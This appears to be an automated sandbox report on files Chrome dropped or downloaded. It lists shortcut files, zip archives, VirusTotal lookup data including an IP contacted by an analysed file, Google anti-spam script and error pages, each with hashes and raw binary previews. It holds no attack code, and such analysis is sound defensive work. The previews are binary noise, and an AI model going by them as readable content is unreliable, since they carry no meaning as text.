                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.......qJ...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............;s.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2689
                                                                                                                                                                                                                    Entropy (8bit):4.015332135201375
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:8UdJWTpyOpAHpteidAKZdA14meh7sFiZUkmgqeh7sXy+BX:8PvCAnVy
                                                                                                                                                                                                                    MD5:33D61FED43DD8A92F5CDE63D6D695D43
                                                                                                                                                                                                                    SHA1:931DF9386605F8DA0BA27EA47D725029CC860C22
                                                                                                                                                                                                                    SHA-256:FB0611F3015E8B57F6A70390CB854FC08A55DE8BFB4AAC29C6C012C663680B7A
                                                                                                                                                                                                                    SHA-512:BEE536D5320B63CDBEE04FF1E79A111CCA18E52BEAFF80C4DDF8A55C344189560586D0C967AEF391687781787A5ED674E362BE65C339B210E32E67D5AC183376
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............;s.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 18:54:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                    Entropy (8bit):4.006703655485927
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:86dJWTpyOpQHpteidAKZdA1TehDiZUkwqehty+R:8FvS3vy
                                                                                                                                                                                                                    MD5:11CD3701AF5927061A6546052CCF57FB
                                                                                                                                                                                                                    SHA1:0C88B6EC529E6FF8793F91CE9A10DB4A1F01B69D
                                                                                                                                                                                                                    SHA-256:5CF162B1B3EFC35900898298446AC4596F425EDFCE5E75F792D866358757749A
                                                                                                                                                                                                                    SHA-512:1441EC3ECBE2EC4A0B600063064A3A82723A8CFD14BAD706E13EEDBA91C7A9C70E11FFBF8395CB83B9ADB65B048A347EC66B6BFD2E3E533E3A4324FE0BB75F49
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....V..qJ...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............;s.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 18:54:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                    Entropy (8bit):3.9948434536101076
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:8FdJWTpyOpQHpteidAKZdA1dehBiZUk1W1qeh7y+C:8svSn9by
                                                                                                                                                                                                                    MD5:AC6B5D02517D303D6616B059BA75FFA3
                                                                                                                                                                                                                    SHA1:7AFD28096340B2EDE4002538FB174C98A17136A8
                                                                                                                                                                                                                    SHA-256:78AAFC32BA688A86E80024794EC20AF5618AE1EA10551202CFAB30422C7A3509
                                                                                                                                                                                                                    SHA-512:5BB72D3FF0CF7E9537EB0D99D16B07082632BCEA0CCE98C9E5E883F86428CB01909E653D65ECC0976F359D2EB831D8E4BDB4D0D9C61BDB605ABB42A0D59A7802
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....1[.qJ...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............;s.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Apr 25 18:54:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                    Entropy (8bit):4.00666463146418
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:48:8CdJWTpyOpQHpteidAKZdA1duTeehOuTbbiZUk5OjqehOuTbVy+yT+:89vSLTfTbxWOvTbVy7T
                                                                                                                                                                                                                    MD5:555847BE5B89B0F375E54C875A0D75A6
                                                                                                                                                                                                                    SHA1:9CE86952835EBB186AEDAD6F6B4013448B973A7D
                                                                                                                                                                                                                    SHA-256:4CEFDE435B2485AB4DF0B984BE1F0B7F84DB074151DF81E11BFDC59D901C64EC
                                                                                                                                                                                                                    SHA-512:1089BB2F10904E30AEF08269A7370DF0AFA9D49CC6AC30AA0E6D4008AA7A1568F96B72401411EFF7C478C4D157EEC32FA9E96385990B4887D0DCE6CC3BB7FDE6
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......vqJ...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.X.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............;s.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):16129
                                                                                                                                                                                                                    Entropy (8bit):7.971008045321434
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:meR7MCXODrmSiz1IiqVtb6SIgZ/asVA4rmi5:DR7MwWSVHqnX9Z/dK4qi5
                                                                                                                                                                                                                    MD5:2500B9292675BB112C654AECEEC77611
                                                                                                                                                                                                                    SHA1:4F686AE4B883AA73748998EEFA03B87C81F69B06
                                                                                                                                                                                                                    SHA-256:555D0ADA5E1E5656ED38E0DFEF8ED8A56600786BDAD39597504398C912B4B53C
                                                                                                                                                                                                                    SHA-512:1048728F92B30D13AA70A614A8C672FAF324CF0C2051B54E86148BC8ED40D8FBC01A7CDFC5FE6D27567E5190F0CED0AC4AE06607BFBA006A10BD842EBFA98374
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:PK..-......*.X................Registry.dat.}.|..g..1/A.. .......c$...3.I..^h.....3.........d../@...x.!Z.a..D@..G.q..}lvW..6.%d..\V.e.cs....._.5.......F%}..._.............M..*q.t....O/.a.;.z.......<.G.Y.D.3......^XV........e.,k`Y...X.....5...e.,k.......8UV.a.o...qi..........zS]0...c..v.....4.....'...F4...u.=...i...Y..j.)...)..w..B.?.B.W..N.v..?....".4qe..y.................5T?R..J.w....4e5....>..NaZ.........[...S.)....W.U..?1....?{(O..(zGJ.+..3A...o..n....T.Z...G.}}.+zV.H..".........y.6..h.c....S5.....QE./...E...?[..YYA...=m..}}....O.........vTx..h...V....(....>..zE......E.br^V@..g..-......A.O<v.^T..c.'m...,A...(..n.%....d..7..d..e.y..0C{*..~C[._.*.|.........S)#..C....{q.Cw.?s..jO+.}%.}.......%..`.<9...p.}.w..v]W....^*EW.I...o.l..:......v..FB._s..w.e.B9..C."....~3...v..%..6._].......-.m..5..K..1...i.&......).....-.X..D.3yT.....gs....;.6D.jwY.....J.m_......b.x.(......x4`...*(...3..`[....)......%.....km.J.#.....X.dLPt..G..,..,C_gRt...g..g...[.N..n.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1063870
                                                                                                                                                                                                                    Entropy (8bit):7.997687111294189
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:24576:4tnGpZCIOG9vMcvFkySgnoQce6Xhdi+J72iRgnzY:4MpktG99vFkypKeih8+J71Wc
                                                                                                                                                                                                                    MD5:282DA020798AFBD7EFF40CE854E8D01F
                                                                                                                                                                                                                    SHA1:29962DAA2D76871C4F2E7609A83984ECD431D44C
                                                                                                                                                                                                                    SHA-256:76F98321F50595725F64F058D8F33103D518C5D77680FD7D5521C41786299358
                                                                                                                                                                                                                    SHA-512:69E3699B20EE8F7225EBB9426E6230485FC78250DDDCC82A6D96B52B04E4AE0734369AB14DA8C0DD02F76758E55B5C28F91F080F7CC8D036ED8CD43D6157EB84
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:PK..-......*.X................Registry.dat.}.|..g..1/A.. .......c$...3.I..^h.....3.........d../@...x.!Z.a..D@..G.q..}lvW..6.%d..\V.e.cs....._.5.......F%}..._.............M..*q.t....O/.a.;.z.......<.G.Y.D.3......^XV........e.,k`Y...X.....5...e.,k.......8UV.a.o...qi..........zS]0...c..v.....4.....'...F4...u.=...i...Y..j.)...)..w..B.?.B.W..N.v..?....".4qe..y.................5T?R..J.w....4e5....>..NaZ.........[...S.)....W.U..?1....?{(O..(zGJ.+..3A...o..n....T.Z...G.}}.+zV.H..".........y.6..h.c....S5.....QE./...E...?[..YYA...=m..}}....O.........vTx..h...V....(....>..zE......E.br^V@..g..-......A.O<v.^T..c.'m...,A...(..n.%....d..7..d..e.y..0C{*..~C[._.*.|.........S)#..C....{q.Cw.?s..jO+.}%.}.......%..`.<9...p.}.w..v]W....^*EW.I...o.l..:......v..FB._s..w.e.B9..C."....~3...v..%..6._].......-.m..5..K..1...i.&......).....-.X..D.3yT.....gs....;.6D.jwY.....J.m_......b.x.(......x4`...*(...3..`[....)......%.....km.J.#.....X.dLPt..G..,..,C_gRt...g..g...[.N..n.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):1063870
                                                                                                                                                                                                                    Entropy (8bit):7.997687111294189
                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                    SSDEEP:24576:4tnGpZCIOG9vMcvFkySgnoQce6Xhdi+J72iRgnzY:4MpktG99vFkypKeih8+J71Wc
                                                                                                                                                                                                                    MD5:282DA020798AFBD7EFF40CE854E8D01F
                                                                                                                                                                                                                    SHA1:29962DAA2D76871C4F2E7609A83984ECD431D44C
                                                                                                                                                                                                                    SHA-256:76F98321F50595725F64F058D8F33103D518C5D77680FD7D5521C41786299358
                                                                                                                                                                                                                    SHA-512:69E3699B20EE8F7225EBB9426E6230485FC78250DDDCC82A6D96B52B04E4AE0734369AB14DA8C0DD02F76758E55B5C28F91F080F7CC8D036ED8CD43D6157EB84
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:PK..-......*.X................Registry.dat.}.|..g..1/A.. .......c$...3.I..^h.....3.........d../@...x.!Z.a..D@..G.q..}lvW..6.%d..\V.e.cs....._.5.......F%}..._.............M..*q.t....O/.a.;.z.......<.G.Y.D.3......^XV........e.,k`Y...X.....5...e.,k.......8UV.a.o...qi..........zS]0...c..v.....4.....'...F4...u.=...i...Y..j.)...)..w..B.?.B.W..N.v..?....".4qe..y.................5T?R..J.w....4e5....>..NaZ.........[...S.)....W.U..?1....?{(O..(zGJ.+..3A...o..n....T.Z...G.}}.+zV.H..".........y.6..h.c....S5.....QE./...E...?[..YYA...=m..}}....O.........vTx..h...V....(....>..zE......E.br^V@..g..-......A.O<v.^T..c.'m...,A...(..n.%....d..7..d..e.y..0C{*..~C[._.*.|.........S)#..C....{q.Cw.?s..jO+.}%.}.......%..`.<9...p.}.w..v]W....^*EW.I...o.l..:......v..FB._s..w.e.B9..C."....~3...v..%..6._].......-.m..5..K..1...i.&......).....-.X..D.3yT.....gs....;.6D.jwY.....J.m_......b.x.(......x4`...*(...3..`[....)......%.....km.J.#.....X.dLPt..G..,..,C_gRt...g..g...[.N..n.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:gzip compressed data, max compression, original size modulo 2^32 40461
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):14522
                                                                                                                                                                                                                    Entropy (8bit):7.98529215515383
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:RRTSKqVJJOlo32oTmT4DLKMnGm0ONMev4jLVqm:RRTLqVJQ2GoyiL3DNMjLVZ
                                                                                                                                                                                                                    MD5:43678F5D83C6CE037A88459BA46D1080
                                                                                                                                                                                                                    SHA1:86DFB8634B802796B6D2C3F340C492D1F5E020A9
                                                                                                                                                                                                                    SHA-256:BC97F26EEE1508BC5B1C6898F9E691C6D0DA72A38EC9A686FC7D6B2C17CB0108
                                                                                                                                                                                                                    SHA-512:22F5DE8E5C953967E8D3F2D309E3EDB8E830AE90DE4D5DFA585A8C62E7AD5B68FC3415E6AF0E6E961DFF70F703C4E03882287E9A4C2AB9A240ED1760790C3EC0
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/gui/stackdriver-errors.b289406877fe6574d5ac.js
                                                                                                                                                                                                                    Preview:...........}k{.H....+......\ \..7....=.4./N.V.%.#y$..I.....UU*..t..s.3.4.K...Z...*...E.Sz6K&.<...|.O...u.......O..l^].....G'...'...y>.."..(....cRv..........;..NU.....x\.....?.O..Ev...8........YZ\.el.T.........Qop|...x..qu/.;.{.).=...>..a.s..........(8...8OO...a...2..%e.z..o..@.x'..~U.pu.L...x.-fi...*..$....I..v..K.oY.S..E...y._'..*.......m..E...Z/_.-.....X..*.O.<..yQ.E.t.'y^...G..@..M.8.k....Q.+.U.XL.."_.....(.g.y....;....!W.....`4..X...n....._..f^..)....d.2.%..q>.;.......~.w?N...@A.0.o..s].~5.fu.=.a."..i..>.i.;wR..E.q.B...h:o&-...O.....<......8#.@.n...~.......A.w7..'.j.9.3...i.1m.e.Y...7._..k3...z...C.....Q..+.'.`P....`........0..rk.v.R.c.f.=L.".|].........P#%....e..L..."o..t.EX.T..h.....YZ.;....sW...)...EhW. GC......Q.^V....H.iGW...t8-,.h..ajj!....4.kX...=.G$....}7..Z.lHr-..*Yi0. ....{...#..!}...{rG.Q.E'.(..R....JC..O.k.S4.......V.<.C...W....0....X...K...=.25.|.1M.....L..........<0.,.......vQh.W................U.2...,Z.w(.z.N
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):270450
                                                                                                                                                                                                                    Entropy (8bit):3.435937563858022
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:1536:gbkCvzLiQbkCvhbkCYRbkCjKbkCHhbkCjA0abkC/DbkCHubkCTMbkCv6vp:qLi90Bvp
                                                                                                                                                                                                                    MD5:295336A267F17AF2B61913AC539488DC
                                                                                                                                                                                                                    SHA1:B849B685F1A1BDC2CF5F8E7009151A9E20F3EBBE
                                                                                                                                                                                                                    SHA-256:D85405F095274D1491569831CAA97D3463F30A14336E975A740B5812872C6C0F
                                                                                                                                                                                                                    SHA-512:0025085B3998FBA08097DD871A9139040B7FF18BE9DEA2F0C110CC82040006565F07CED01BFE41D82E3F9E25553AFBC1286239E4269A4454F599BC3548B3AEB4
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.virustotal.com/ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips
                                                                                                                                                                                                                    Preview:{. "data": [. {. "id": "103.35.188.98",. "type": "ip_address",. "links": {. "self": "https://www.virustotal.com/ui/ip_addresses/103.35.188.98". },. "attributes": {. "reputation": 0,. "last_analysis_results": {. "Acronis": {. "method": "blacklist",. "engine_name": "Acronis",. "category": "harmless",. "result": "clean". },. "0xSI_f33d": {. "method": "blacklist",. "engine_name": "0xSI_f33d",. "category": "undetected",. "result": "unrated". },. "Abusix": {. "method": "blacklist",. "engine_name": "Abusix",. "category": "harmless",.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17673)
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):18268
                                                                                                                                                                                                                    Entropy (8bit):5.619856960314813
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:384:Va/VuX6x1E4rZ5gIcAGn5o86/TZeIeaedo/939zg:Ukqxe4rZ5gIcAGnQ/tEaeE9C
                                                                                                                                                                                                                    MD5:9FBB8606566EBF96C502666BFFFD254A
                                                                                                                                                                                                                    SHA1:FEB80CB296B30432EC659D7EEDFE3C6022A450E2
                                                                                                                                                                                                                    SHA-256:9644D7AB8F581B9FDE8F5C3B9B84FD370FF52F1D4E71DD60B5E590A6C7D5FD39
                                                                                                                                                                                                                    SHA-512:7C9C38D0710B52EE4761EEAC4E50BB8F5E319C5AFA49253888D0F45B42DB03DE244181AF62A0BC0431D0AB963AB04A5FD2263907CE0B1188BCB1F6954622204C
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    URL:https://www.google.com/js/bg/lkTXq49YG5_ej1w7m4T9Nw_1Lx1Ocd1gteWQpsfV_Tk.js
                                                                                                                                                                                                                    Preview:/* Anti-spam. Want to say hello? Contact (base64) Ym90Z3VhcmQtY29udGFjdEBnb29nbGUuY29t */ (function(){var f=function(R,N){if(!(N=(R=e.trustedTypes,null),R)||!R.createPolicy)return N;try{N=R.createPolicy("bg",{createHTML:p,createScript:p,createScriptURL:p})}catch(P){e.console&&e.console.error(P.message)}return N},p=function(R){return R},e=this||self;(0,eval)(function(R,N){return(N=f())&&1===R.eval(N.createScript("1"))?function(P){return N.createScript(P)}:function(P){return""+P}}(e)(Array(7824*Math.random()|0).join("\n")+['(function(){/*',.'',.' SPDX-License-Identifier: Apache-2.0',.'*/',.'var Re=function(R,N){return R[N]<<24|R[(N|0)+1]<<16|R[(N|0)+2]<<8|R[(N|0)+3]},d=function(R,N,p){if(438==R||331==R)N.X[R]?N.X[R].concat(p):N.X[R]=N_(p,N);else{if(N.ri&&247!=R)return;466==R||163==R||161==R||301==R||172==R||120==R||59==R||298==R||344==R?N.X[R]||(N.X[R]=PR(N,p,R,142)):N.X[R]=PR(N,p,R,49)}247==R&&(N.h=q(false,32,N),N.R=void 0)},eZ=function(R,N,p,e){W((e=V((p=V(R),R)),e),R,z(N,Z(p,R)))},sH=
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):181
                                                                                                                                                                                                                    Entropy (8bit):4.328146837827697
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:TDFFF0KBojEV5hPKZHFFFizXO8HOAWRRkPFzA5KiAFVTCWI1A5HFNhBUliAn:TD/uaoBZAbO8HvWRRe3ePilNXUwAn
                                                                                                                                                                                                                    MD5:478EBD50127DA8FF67F45FF32B1FADC9
                                                                                                                                                                                                                    SHA1:1AD153784C05C6BE30B95D8835CEDD9D5183FFA8
                                                                                                                                                                                                                    SHA-256:EE402D01A943841EAFC309DF31EA958A981844B5C7A4A833164A22036B624C42
                                                                                                                                                                                                                    SHA-512:B1EA3400186FCFE43A9DFFCA955A13A0E5DF6C0A77EAE47129447F1FB9110B618B786969ABADF975D3AE36A3CB4B19F1CD1483232F3024F3BA5B10BC902D1018
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:{. "error": {. "code": "RecaptchaRequiredError",. "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header". }.}
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:HTML document, ASCII text
                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                    Size (bytes):178
                                                                                                                                                                                                                    Entropy (8bit):5.052424732227886
                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                    SSDEEP:3:PIy796FD0k+zrrIJZNQEXRnBeBvETbjSraDiSABFESwzRx3DW:B8FQk+HrIjuEX8EurzEPzRx3y
                                                                                                                                                                                                                    MD5:82A25870711ACAA9FE373F2252F79475
                                                                                                                                                                                                                    SHA1:01B1DF0CE8E76F49129F112BE3FB0CDFEF696818
                                                                                                                                                                                                                    SHA-256:1AD3E4394B5F2363B8F1B0525D221A8E1481919232068010921794C541CEF10E
                                                                                                                                                                                                                    SHA-512:F25FBB843B0DABE41FDA7D72CBA16E5AD07684D9F39F037907DDFEE7639CBE5F48C1B52F17258382A7D7B0D657BCDB518B5BF20281ADD141115808C63080A7E9
                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                    Preview:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">.<title>405 Method Not Allowed</title>.<h1>Method Not Allowed</h1>.<p>The method is not allowed for the requested URL.</p>.
                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                    Size (bytes):23190
                                                                                                                                                                                                                    Entropy (8bit):7.975574955056152
                                                                                                                                                                                                                    Encrypted:false
